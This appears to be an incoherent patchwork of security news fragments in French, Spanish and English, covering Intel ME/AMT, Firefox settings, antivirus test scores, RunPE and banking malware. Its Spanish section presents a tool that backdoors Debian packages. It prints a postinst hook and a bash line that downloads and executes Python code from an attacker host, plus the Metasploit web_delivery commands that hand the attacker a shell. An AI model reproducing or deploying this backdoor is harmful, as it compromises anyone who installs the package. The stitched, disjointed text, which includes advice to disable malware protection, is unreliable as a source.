C'est parce que Intel AMT SOL fait partie de Intel ME (Management Engine), un processeur séparé intégré aux processeurs Intel, qui gère son propre système d'exploitation.

Intel ME s'exécute même lorsque le processeur principal est éteint et, bien que cette fonctionnalité soit assez sombre, Intel a créé ME pour fournir des capacités d'administration à distance aux entreprises qui gèrent de gros réseaux de milliers d'ordinateurs.

Dans la pile de composants ME, AMT fournit une fonctionnalité de gestion à distance pour les processeurs et chipsets Intel vPro. L'AMT SOL est une interface Serial-over-Lan pour la fonction de gestion à distance Intel AMT qui expose une interface série virtuelle via TCP.

Parce que cette interface AMT SOL fonctionne à l'intérieur d'Intel ME, elle est distincte du système d'exploitation normal, où les pare-feu et les produits de sécurité sont provisionnés pour fonctionner.

En outre, car il fonctionne à l'intérieur d'Intel ME, l'interface AMT SOL reste opérationnelle même si le PC est éteint, mais l'ordinateur est toujours connecté physiquement au réseau, ce qui permet au moteur Intel ME d'envoyer ou de recevoir des données via TCP.

Achetez US !!

Ça crains :(


Kimi es un sencillo script escrito en Python para crear un paquete Debian que activará un backdoor en el mismo momento en que la víctima intente instalarlo.


Lo que hace es desplegar un fichero bash en el directorio  “/usr/local/bin/”:

#!/bin/bash
python -c "import urllib2; r = urllib2.urlopen('http://192.168.0.102:8080/SecPatch'); exec(r.read());"  

que se ejecutará inmediatamente al ser llamado mediante el fichero postinst:

#!/bin/bash

chmod 2755 /usr/local/bin/prueba && /usr/local/bin/prueba

Como veis, la llamada es hacia la máquina del atacante que hospeda un payload, que previamente generó un servidor mediante el módulo Web Delivery de Metasploit

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

y generó el payload malicioso con:

sudo python kimi.py -n prueba -l 192.168.0.102 -V 1.0

Finalmente como podéis ver en la siguiente imagen, al instalar el paquete, el atacante obtendrá una sesión sobre la máquina de la víctima:


El proyecto fue hecho para integrarse con Venom Shellcode Generator 1.0.13, pero puede usarse de forma independiente y puede adaptarse para que funcione fácilmente con otro generador de payloads.

Se ha probado en:

- Linux Mint 17.2 Cinnamon (Ubuntu 14.04)
- ParrotOS (Debian Jessie)
- Kali Rolling 2.0

El nombre de la tool proviene de Kimimaro de la serie Naruto
Proyecto: https://github.com/ChaitanyaHaritash/kimi

vérifiez, les paramètres de security.tls.version afin que les valeurs soient celles-ci (min à 1 et max à 3):
security tls version firefox


Ensuite, modifiez :

   geo.enabled à False afin de supprimer la géolocalisation
   network.http.sendRefererHeader à 0 afin de ne plus communiquer la dernière page visitée
   browser.safebrowsing.malware.enabled à False et supprimez les données de browser.safebrowsing.provider.google.lists afin d’éviter que Google vous profile
   offline-apps.allow_by_default à False et offline-apps.quota.warn à 0 afin que les données offline ne soient utilisées à votre insu

N’oubliez pas de modifier les préférences par défaut afin d’éviter d’être pisté et d’accepter les cookies tiers inutiles.

[...]Since KeySweeper looks almost identical to USB phone chargers that are ubiquitous in homes and offices, it lowers the chances of discovering the sniffing device by a target.

Intel ME is a microcontroller, and part of Intel's AMT hardware and firmware technology which allows administrators to remotely manage the hardware over network – all underneath whatever operating system is running. As this management is conducted at a low-level in the stack, it dodges the OS – meaning overwriting your out-of-the-box Windows installation with a Linux distro will not guarantee any trustworthiness.

The ME microcontroller comes with its own RAM, it can access the system's RAM, and it has its own private ROM of firmware code, which nobody may inspect. “It runs a whole bunch of proprietary programs,” said Rutkowska, “and even runs Intel's own proprietary operating system, and this is all happening whenever you have some power connected to your processor, even in sleep mode, and it could be doing anything it wants.”

She added:

   The first thought for security people is that this is an ideal backdooring or rootkitting infrastructure. Which is true. However there is another problem, what I call the 'Zombification' of personal computing.

A tester version desktop http://support.eset.com/kb2653/



[...]Reconnaissance de logiciels malveillants pour Windows

Au total, 8 des 16 produits ont reconnu entre 99,7 et 99,9 % des 12 000 attaquants pour Windows utilisés dans le test : Avast, F-Secure, Bitdefender, ESET, eScan, G Data, Kaspersky Lab (version serveur) et Sophos. Seule la suite de protection de Symantec a atteint les 100 %.

Les taux d'identification de McAfee et Comodo sont clairement inférieurs avec respectivement 85,1 % et 83 %. Les résultats de Dr. Web (67,8 %), F-Prot (22,1 %) et ClamAV (15,3 %) sont dramatiquement faibles !



Reconnaissance de logiciels malveillants pour Linux

Des programmes malveillants de plus en plus perfides sont développés pour Linux puis mis en circulation. Le laboratoire a lancé 900 attaquants pour Linux sur les systèmes. Ces attaquants étaient en principe déjà connus. Le résultat diffère cependant nettement des taux de reconnaissance avec Windows. Seule la version Endpoint de Kaspersky a réussi à atteindre un taux d'identification de 100 % avec Linux. ESET et AVG suivent de près avec 99,7 % et 99 %. Les versions pour serveur de Kaspersky Lab et Avast reconnaissent tout de même plus de 98 % des attaquants. Symantec, qui avait obtenu le meilleur résultat avec Windows, n’identifie plus que 97,2 % des logiciels malveillants avec Linux. Ensuite, c’est la chute libre.

Les lanternes rouges en matière de reconnaissance des programmes malveillants pour Linux sont représentées par ClamAV, McAfee, Comodo et F-Prot. Leurs valeurs se situent entre 66,1 et 23 %. Dans le pire des cas, 77 attaquants sur 100 ne sont tout simplement pas identifiés sur Linux malgré l’utilisation du logiciel de protection. [...]

TLS est un monde malheureusement (très) compliqué, et source de (trop) nombreuses erreurs. Suite à plusieurs demandes, un petit billet de survol...

$ find ~/.config/autostart -name '.whoopsie*'

ABOMINABLE !!

Pour faire simple, la technique RunPE consiste à démarrer un processus légitime souvent signé puis de le suspendre pour remplacer son contenu par une application malicieuse, ainsi cela permet de contourner les restrictions des par feux et d’exécuter du code directement en mémoire. Malheureusement, très pratique pour piéger les antivirus. Une technique utilisée par les pirates dans leurs « crypteurs », mais aussi dans de nombreux RAT. De nombreux outils malveillants continuent d’utiliser cette technique populaire, bilan, JP Lesueur a décidé de faire un outil qui se charge de repérer la menace.

Un logiciel d’analyse dynamique, et non statique, qui détecte la menace et, permet même dans certains cas, de récupérer la source de la menace. Le logiciel est gratuit.

Vawtrak surveille en permanence l'utilisateur en enregistrant les frappes de clavier, en prenant des captures d'écran ou encore en enregistrant les actions de l'utilisateur sur le bureau dans une vidéo AVI...